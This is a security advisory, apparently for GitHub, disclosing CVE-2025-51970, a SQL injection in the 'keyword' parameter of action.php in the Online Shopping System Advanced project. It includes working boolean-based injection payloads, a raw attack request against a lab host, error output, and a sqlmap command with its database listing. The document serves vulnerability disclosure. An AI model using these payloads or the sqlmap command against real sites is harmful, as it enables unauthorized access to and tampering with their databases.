# CVE-2025-51970

CVE-2025-51970 - SQL Injection in Online Shopping System Advanced

## Summary

A critical SQL Injection vulnerability was discovered in the `Online Shopping System Advanced` project by **PuneethReddyHC**. The flaw resides in `action.php`, which fails to properly sanitize user input from the `keyword` POST parameter. An attacker can inject malicious SQL to extract data or tamper with the database.

---

##  Technical Details

- **Vulnerability Type**: SQL Injection  
- **Affected File**: `action.php`  
- **Parameter**: `keyword` (via POST)  
- **Affected Version**: 1.0  
- **Attack Type**: Remote  
- **Impact**: Unauthorized data access, database manipulation  

---

##  Proof of Concept (PoC)

###  True Payload (Bypasses Logic)

<Highlight language="sql">
e%' AND ((42)=(43-1)) AND '0004XX7'!='0004XX7%
</Highlight>

###  False Payload (Fails Logic)

<Highlight language="sql">
e%' AND ((42)=(43)) AND '0004XX7'!='0004XX7%
</Highlight>

---

##  HTTP Request 
````
<Highlight language="http">
POST /online-shopping-system-advanced-master/action.php HTTP/1.1
Host: 192.168.1.109
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: */*
Referer: http://192.168.1.109/online-shopping-system-advanced-master/
Content-Length: 75
Connection: close
keyword=test'&search=1
</Highlight>
````
##  HTTP Response 
```
HTTP/1.1 200 OK
Date: Sun, 20 Jul 2025 10:07:50 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12

Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; 
check the manual that corresponds to your MariaDB server version for the right 
syntax to use near ''' at line 1 in 
C:\xampp\htdocs\online-shopping-system-advanced-master\action.php:193
```
##  Database Fingerprint Example

<Highlight language="sql">
SELECT database();  -- Returns `onlineshop`
</Highlight>

---


```sql
e%' AND 2*3*8=6*8 AND '0004XX7'!='0004XX7%
e%' AND 3*2>5 AND '0004XX7'!='0004XX7%
e%' AND 3*2*0>=0 AND '0004XX7'!='0004XX7%
```

##  Automated Exploitation with sqlmap

The vulnerability can be confirmed and exploited automatically using **sqlmap**.

###  Command Used

```bash
sqlmap -u "http://192.168.1.109/action.php" --data="keyword=test&search=1" --dbs
```


###  Output

```
[13:07:39] [INFO] fetching database names
available databases [6]:
[*] information_schema
[*] mysql
[*] onlineshop
[*] performance_schema
[*] phpmyadmin
[*] test
```



<img width="2551" height="1029" alt="image" src="https://github.com/user-attachments/assets/853c5fc4-f68a-41ce-ab34-9c699c59e436" />
